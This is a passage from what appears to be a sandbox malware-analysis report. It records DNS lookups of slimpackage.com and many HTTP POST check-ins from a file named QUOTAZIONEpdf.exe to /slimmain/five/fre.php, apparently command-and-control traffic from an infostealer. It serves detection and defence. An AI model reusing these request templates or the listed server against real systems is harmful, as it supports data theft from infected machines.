              Jan 14, 2022 09:53:19.715605974 CET8.8.8.8192.168.2.30x6477No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:21.045577049 CET8.8.8.8192.168.2.30x5995No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:22.662409067 CET8.8.8.8192.168.2.30xdc3bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:25.115611076 CET8.8.8.8192.168.2.30xbb7aNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:26.502017975 CET8.8.8.8192.168.2.30xe699No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:27.941533089 CET8.8.8.8192.168.2.30x9470No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:29.298034906 CET8.8.8.8192.168.2.30xc434No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:32.240061998 CET8.8.8.8192.168.2.30x2c67No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:34.666029930 CET8.8.8.8192.168.2.30x502bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:38.389735937 CET8.8.8.8192.168.2.30x34b2No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:42.336323023 CET8.8.8.8192.168.2.30x2d60No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:50.257669926 CET8.8.8.8192.168.2.30x9197No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:54.140160084 CET8.8.8.8192.168.2.30xb7c1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:56.908751011 CET8.8.8.8192.168.2.30x33b5No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:59.475377083 CET8.8.8.8192.168.2.30x9b3cNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:01.956938028 CET8.8.8.8192.168.2.30x41cfNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:03.375410080 CET8.8.8.8192.168.2.30x48f0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:04.778942108 CET8.8.8.8192.168.2.30x2242No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:07.472659111 CET8.8.8.8192.168.2.30xc831No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:10.580290079 CET8.8.8.8192.168.2.30x389No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:14.443897963 CET8.8.8.8192.168.2.30xd0beNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:16.845690966 CET8.8.8.8192.168.2.30x8155No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:20.180885077 CET8.8.8.8192.168.2.30xfb07No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:22.149153948 CET8.8.8.8192.168.2.30x2293No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:24.624635935 CET8.8.8.8192.168.2.30xf44eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:25.991489887 CET8.8.8.8192.168.2.30x85e0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:27.325659990 CET8.8.8.8192.168.2.30x50f2No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:28.613475084 CET8.8.8.8192.168.2.30xebb1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:30.048664093 CET8.8.8.8192.168.2.30x1a9aNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:31.371239901 CET8.8.8.8192.168.2.30x371eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:32.668024063 CET8.8.8.8192.168.2.30xf39eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:34.109834909 CET8.8.8.8192.168.2.30x1648No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:54:35.455698967 CET8.8.8.8192.168.2.30x4a4bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • slimpackage.com

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.349742104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:38.800709009 CET1104OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 190
              Connection: close
              Jan 14, 2022 09:52:39.061507940 CET1105INHTTP/1.1 404 Not Found
              Date: Fri, 14 Jan 2022 08:52:37 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.349743104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:40.325541973 CET1106OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 190
              Connection: close
              Jan 14, 2022 09:52:40.603960991 CET1106INHTTP/1.1 404 Not Found
              Date: Fri, 14 Jan 2022 08:52:39 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              10192.168.2.349752104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:54.669015884 CET1121OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:54.926312923 CET1122INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:53 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              11192.168.2.349755104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:57.212577105 CET1145OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:57.467825890 CET1146INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:56 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              12192.168.2.349756104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:59.611439943 CET1147OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:59.868741035 CET1147INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:58 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              13192.168.2.349757104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:02.120827913 CET1148OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:02.376370907 CET1149INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:01 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              14192.168.2.349758104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:03.980417013 CET1149OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:04.236856937 CET1150INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:03 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              15192.168.2.349759104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:06.924773932 CET1151OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:07.233124971 CET1151INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:06 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              16192.168.2.349760104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:08.606764078 CET1152OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:08.864233971 CET1153INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:07 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              17192.168.2.349761104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:10.307977915 CET1154OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:10.631426096 CET1154INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:09 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              18192.168.2.349762104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:11.692209005 CET1155OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:11.946695089 CET1156INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:10 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              19192.168.2.349763104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:13.390691996 CET1156OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:13.657711029 CET1157INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:12 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.349744104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:41.740730047 CET1107OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:41.998064995 CET1108INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:40 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              20192.168.2.349764104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:15.147551060 CET1158OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:15.406161070 CET1158INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:14 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              21192.168.2.349765104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:16.674288988 CET1159OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:16.934175968 CET1160INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:15 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              22192.168.2.349766104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:18.230034113 CET1161OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:18.484214067 CET1163INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:17 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              23192.168.2.349770104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:19.843821049 CET1166OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:20.097187996 CET1167INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:19 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              24192.168.2.349771104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:21.176589966 CET1168OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:21.435849905 CET1168INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:20 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              25192.168.2.349772104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:22.793267965 CET1169OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:23.150387049 CET1170INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:21 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              26192.168.2.349773104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:25.250387907 CET1171OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:25.508188009 CET1171INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:24 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              27192.168.2.349775104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:26.628571033 CET1245OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:26.881258965 CET1298INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:25 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              28192.168.2.349781104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:28.069977045 CET1431OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:28.325772047 CET1465INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:27 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              29192.168.2.349789104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:29.435189962 CET1800OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:29.699652910 CET1912INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:28 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.349745104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:43.225955009 CET1109OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:43.481673956 CET1109INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:42 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              30192.168.2.349806104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:32.376585007 CET1984OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:32.632582903 CET1987INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:31 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              31192.168.2.349813104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:34.797107935 CET2000OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:35.055516958 CET2000INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:33 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              32192.168.2.349814104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:38.518335104 CET2001OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:38.778532028 CET2002INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:37 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              33192.168.2.349815104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:42.966613054 CET2003OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:43.286082029 CET2005INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:42 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              34192.168.2.349821104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:50.386625051 CET9596OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:50.642754078 CET9596INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:49 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              35192.168.2.349822104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
